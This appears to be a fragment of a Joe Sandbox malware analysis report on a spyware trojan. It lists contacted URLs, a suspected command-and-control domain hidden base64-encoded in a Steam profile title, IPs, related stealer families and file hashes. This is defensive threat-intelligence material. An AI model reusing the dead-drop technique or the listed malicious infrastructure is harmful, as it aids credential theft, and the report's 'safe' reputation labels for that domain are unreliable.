                                                                                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                          		high
                                                                                          https://store.steampowered.com/;Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://store.steampowered.com/about/76561199609719039[1].htm.0.drfalse
                                                                                              		high
                                                                                              https://steamcommunity.com/my/wishlist/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/-Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://help.steampowered.com/en/Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                    		high
                                                                                                    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/market/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/news/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                          		high
                                                                                                          https://community.akamai.steamstatic.com/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=roSu8uqwGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                              		high
                                                                                                              https://dervinko.bizGj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://store.steampowered.com/subscriber_agreement/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                    		high
                                                                                                                    https://recaptcha.net/recaptcha/;Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                      		high
                                                                                                                      https://steamcommunity.com/discussions/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                        		high
                                                                                                                        https://dervinko.biz/Up/bistAndAuditAlarmByHandleertaGj8P0mbklo.exe, 00000000.00000003.2145426350.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2145176778.00000000050CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://store.steampowered.com/stats/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                          		high
                                                                                                                          https://medal.tvGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://broadcast.st.dl.eccdnx.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                            		high
                                                                                                                            https://store.steampowered.com/steam_refunds/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                              		high
                                                                                                                              http://x1.c.lencr.org/0Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://x1.i.lencr.org/0Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199609719039(Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://dervinko.biz/Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://steamcommunity.com/profiles/76561199609719039BGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://steamcommunity.com/workshop/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://login.steampowered.com/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/legal/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ABA&aGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199609719039[1].htm.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoGj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://dervinko.biz/Up/byDllcGj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://recaptcha.netGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://store.steampowered.com/76561199609719039[1].htm.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://127.0.0.1:27060Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://steamcommunity.com/profiles/76561199609719039/inventory/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=KyfgrihL0xta&l=eGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ac.ecosia.org/autocomplete?q=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  23.61.62.148
                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                  		16625AKAMAI-ASUSfalse
                                                                                                                                                                  104.21.13.203
                                                                                                                                                                  		dervinko.bizUnited States
                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                  Analysis ID:1436772
                                                                                                                                                                  Start date and time:2024-05-06 15:19:09 +02:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 4m 18s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:Gj8P0mbklo.exe
                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                  Original Sample Name:f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835.exe
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal84.troj.spyw.winEXE@1/2@2/2
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                  • Number of executed functions: 32
                                                                                                                                                                  • Number of non-executed functions: 78
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  No simulations

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  23.61.62.148onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            https://steamfiller.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                https://steam.workshopfiledetail.com/sharedfiles/filedetails/m4a4_celestial_moonGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  5zq2Yob8xh.exeGet hashmaliciousGCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      104.21.13.203ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                        https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--AtocETicket&~campaign=WebToApp&~tags=locale%3Den_GB&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Den-GB&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FGB%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=https://denvercbdonline.com/img/new/cjgscb/miket@seprint.comGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          steamcommunity.comonxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                                          https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.96.244.29
                                                                                                                                                                                          BS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 23.66.133.162
                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                                          tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                          WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                                                          • 104.104.85.160
                                                                                                                                                                                          dervinko.bizonxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 172.67.133.22
                                                                                                                                                                                          ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                          • 172.67.133.22
                                                                                                                                                                                          ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                          • 104.21.13.203

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          AKAMAI-ASUSonxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 96.17.61.58
                                                                                                                                                                                          powershell.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.193.120.112
                                                                                                                                                                                          pDWZMd3100.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                          • 23.40.23.231
                                                                                                                                                                                          bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 96.16.159.21
                                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.50.124.114
                                                                                                                                                                                          https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.50.124.114
                                                                                                                                                                                          BS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 23.66.133.162
                                                                                                                                                                                          PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.47.168.24
                                                                                                                                                                                          Copy of BARBOT CONSTRUCTION.xlsxGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                          • 69.192.108.161
                                                                                                                                                                                          CLOUDFLARENETUSonxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 172.67.133.22
                                                                                                                                                                                          https://cj96332.tw1.ru/choruspro/choruspro/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                          html.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                                          heisgood.docGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                          REQUEST FOR QUOTATION.docx.docGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                          • 172.67.74.152
                                                                                                                                                                                          Order4500318042.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                          • 104.21.89.249
                                                                                                                                                                                          #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.21.89.249
                                                                                                                                                                                          #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.21.89.249
                                                                                                                                                                                          FW_ New PO Acknowledgement From The Vankam Freightways.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                          https://www.autohotkey.com/download/ahk-v2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.21.89.135

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          SecuriteInfo.com.NSIS.MalwareX-gen.17953.29383.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          EXP263 Grupa Decora ARKU8341370 1x40.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          List of our requirements 06520204Fly Wing.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          EXP263 Decora Group ARKU8341370 1x40.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          73zGJqwgDy.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          J5kltefeTK.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          qxn9Zvy1at.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          R3vjRWX78A.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203
                                                                                                                                                                                          Hy424UHYHW.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                                          • 104.21.13.203

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199609719039[1].htm

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):34789
                                                                                                                                                                                          Entropy (8bit):5.386073524863294
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:/dpqm+0Ih3YAA9CWGEmfcDAfPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2w:/d8m+0Ih3YAA9CWGEmFfPzzgiJmDzJtT
                                                                                                                                                                                          MD5:A3CECEDB9036A82F050828BAA42E21D0
                                                                                                                                                                                          SHA1:B4DE8B997C26E3CEAEB0C647B593E131E21BC6DB
                                                                                                                                                                                          SHA-256:75F75C4403BFE3AFD61DDF8898252F488713CE759C5B3E08AD15657158912B6C
                                                                                                                                                                                          SHA-512:7BA36300556F6BD255A6D414C70C032C276A72558F1457BEF08537B5A640A50D50C9A124736638696812A19A23C01722F4013DC96746567063053FC9A5C00949
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: 3e3 aHR0cHM6Ly9kZXJ2aW5rby5iaXo=</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<lin

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\89737b57-777d-400d-bb7f-77b7e024920e[1].txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (47680), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):47680
                                                                                                                                                                                          Entropy (8bit):5.362966359018906
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:vzsNZzFhOnDMIf19+kXSV0brSxnb22fnc6KWWhv6GYcnvabaMi9idvbU0nagalQb:v0zPO9f1ouYgLvRMymbU0ni4xKjo
                                                                                                                                                                                          MD5:0B236AC4395E5E40F5AB3140CB892115
                                                                                                                                                                                          SHA1:9AC2290905D9996E95291C84E14FF1006BFEE483
                                                                                                                                                                                          SHA-256:ECB0B0F87288C16207310A58C67A25AC557A54FA328E74F592C051F1C44176FB
                                                                                                                                                                                          SHA-512:87422C27CD7039C6A15CE32DE54E7733075F000A099191BE456594F2730F25559BB32862FE189159C2A8FADB3A52C863E052A44F66CE3CA24968A95FCE4F7E09
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
